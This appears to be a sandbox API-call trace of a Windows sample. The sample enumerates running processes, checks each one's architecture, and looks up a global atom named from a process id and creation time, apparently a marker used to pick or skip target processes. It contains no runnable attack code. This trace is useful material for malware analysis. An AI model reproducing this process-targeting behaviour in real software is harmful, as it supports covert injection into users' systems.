	[0128.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d188, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0128.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0128.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2dc
	[0128.181] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.181] CloseHandle (hObject=0x2dc) returned 1
	[0128.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x2dc
	[0128.181] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.181] CloseHandle (hObject=0x2dc) returned 1
	[0128.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x2dc
	[0128.182] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.182] CloseHandle (hObject=0x2dc) returned 1
	[0128.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x2dc
	[0128.182] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.182] CloseHandle (hObject=0x2dc) returned 1
	[0128.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0128.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x2dc
	[0128.182] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.182] CloseHandle (hObject=0x2dc) returned 1
	[0128.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x2dc
	[0128.183] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.183] CloseHandle (hObject=0x2dc) returned 1
	[0128.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0128.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x2dc
	[0128.184] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.184] CloseHandle (hObject=0x2dc) returned 1
	[0128.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x2dc
	[0128.184] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.184] CloseHandle (hObject=0x2dc) returned 1
	[0128.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x2dc
	[0128.185] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.185] CloseHandle (hObject=0x2dc) returned 1
	[0128.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x2dc
	[0128.185] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.185] CloseHandle (hObject=0x2dc) returned 1
	[0128.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x2dc
	[0128.186] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.186] CloseHandle (hObject=0x2dc) returned 1
	[0128.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0128.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x2dc
	[0128.186] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.186] CloseHandle (hObject=0x2dc) returned 1
	[0128.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9708, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0128.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x2dc
	[0128.187] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.187] CloseHandle (hObject=0x2dc) returned 1
	[0128.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x2dc
	[0128.187] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.187] CloseHandle (hObject=0x2dc) returned 1
	[0128.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x2dc
	[0128.187] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.187] CloseHandle (hObject=0x2dc) returned 1
	[0128.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.188] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x2dc
	[0128.188] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.188] CloseHandle (hObject=0x2dc) returned 1
	[0128.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0128.188] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x2dc
	[0128.188] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.188] CloseHandle (hObject=0x2dc) returned 1
	[0128.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x2dc
	[0128.189] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.189] CloseHandle (hObject=0x2dc) returned 1
	[0128.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x2dc
	[0128.189] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.189] CloseHandle (hObject=0x2dc) returned 1
	[0128.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5b80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x2dc
	[0128.190] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.190] CloseHandle (hObject=0x2dc) returned 1
	[0128.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9938, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0128.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x2dc
	[0128.190] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.190] CloseHandle (hObject=0x2dc) returned 1
	[0128.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x2dc
	[0128.191] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.191] CloseHandle (hObject=0x2dc) returned 1
	[0128.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0128.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x2dc
	[0128.191] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.191] CloseHandle (hObject=0x2dc) returned 1
	[0128.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0128.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x2dc
	[0128.192] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.192] CloseHandle (hObject=0x2dc) returned 1
	[0128.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x2dc
	[0128.192] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.192] CloseHandle (hObject=0x2dc) returned 1
	[0128.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0128.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x2dc
	[0128.192] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.192] CloseHandle (hObject=0x2dc) returned 1
	[0128.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0128.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x2dc
	[0128.193] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.193] CloseHandle (hObject=0x2dc) returned 1
	[0128.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0128.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0128.193] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.193] CloseHandle (hObject=0x2dc) returned 1
	[0128.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0128.194] GetLastError () returned 0x5
	[0128.194] GetLastError () returned 0x5
	[0128.194] GetLastError () returned 0x5
	[0128.194] GetLastError () returned 0x5
	[0128.194] GetLastError () returned 0x5
	[0128.194] GetLastError () returned 0x5
	[0128.194] GetLastError () returned 0x5
	[0128.194] GetLastError () returned 0x5
	[0128.194] GetLastError () returned 0x5
	[0128.194] GetLastError () returned 0x5
	[0128.194] GetLastError () returned 0x5
	[0128.194] GetLastError () returned 0x5
	[0128.194] GetLastError () returned 0x5
	[0128.194] GetLastError () returned 0x5
	[0128.194] GetLastError () returned 0x5
	[0128.194] GetLastError () returned 0x5
	[0128.194] GetLastError () returned 0x5
	[0128.194] GetLastError () returned 0x5
	[0128.194] GetLastError () returned 0x5
	[0128.194] GetLastError () returned 0x5
	[0128.194] GetLastError () returned 0x5
	[0128.194] GetLastError () returned 0x5
	[0128.194] GetLastError () returned 0x5
	[0128.194] GetLastError () returned 0x5
	[0128.194] GetLastError () returned 0x5
	[0128.194] GetLastError () returned 0x5
	[0128.194] GetLastError () returned 0x5
	[0128.194] GetLastError () returned 0x5
	[0128.194] GetLastError () returned 0x5
	[0128.194] GetLastError () returned 0x5
	[0128.194] GetLastError () returned 0x5
	[0128.194] GetLastError () returned 0x5
	[0128.194] GetLastError () returned 0x5
	[0128.195] GetLastError () returned 0x5
	[0128.195] GetLastError () returned 0x5
	[0128.195] GetLastError () returned 0x5
	[0128.195] GetLastError () returned 0x5
	[0128.195] GetLastError () returned 0x5
	[0128.195] GetLastError () returned 0x5
	[0128.195] GetLastError () returned 0x5
	[0128.195] GetLastError () returned 0x5
	[0128.195] GetLastError () returned 0x5
	[0128.195] GetLastError () returned 0x5
	[0128.195] GetLastError () returned 0x5
	[0128.195] GetLastError () returned 0x5
	[0128.195] GetLastError () returned 0x5
	[0128.195] GetLastError () returned 0x5
	[0128.195] GetLastError () returned 0x5
	[0128.195] GetLastError () returned 0x5
	[0128.195] GetLastError () returned 0x5
	[0128.195] GetLastError () returned 0x5
	[0128.195] GetLastError () returned 0x5
	[0128.195] GetLastError () returned 0x5
	[0128.195] GetLastError () returned 0x5
	[0128.195] GetLastError () returned 0x5
	[0128.195] GetLastError () returned 0x5
	[0128.195] GetLastError () returned 0x5
	[0128.195] GetLastError () returned 0x5
	[0128.195] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.195] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0128.195] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.196] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.197] GetLastError () returned 0x5
	[0128.198] GetLastError () returned 0x5
	[0128.198] GetLastError () returned 0x5
	[0128.198] GetLastError () returned 0x5
	[0128.198] GetLastError () returned 0x5
	[0128.198] GetLastError () returned 0x5
	[0128.198] GetLastError () returned 0x5
	[0128.198] GetLastError () returned 0x5
	[0128.198] GetLastError () returned 0x5
	[0128.198] GetLastError () returned 0x5
	[0128.198] GetLastError () returned 0x5
	[0128.198] GetLastError () returned 0x5
	[0128.198] GetLastError () returned 0x5
	[0128.198] GetLastError () returned 0x5
	[0128.198] GetLastError () returned 0x5
	[0128.198] GetLastError () returned 0x5
	[0128.198] GetLastError () returned 0x5
	[0128.198] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.198] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0128.198] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.199] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0128.199] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0128.199] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0128.199] CloseHandle (hObject=0x2dc) returned 1
	[0128.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0128.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b59e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x2dc
	[0128.199] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.199] CloseHandle (hObject=0x2dc) returned 1
	[0128.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x2dc
	[0128.200] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.200] CloseHandle (hObject=0x2dc) returned 1
	[0128.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0128.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x2dc
	[0128.200] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.200] CloseHandle (hObject=0x2dc) returned 1
	[0128.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x2dc
	[0128.201] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.201] CloseHandle (hObject=0x2dc) returned 1
	[0128.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
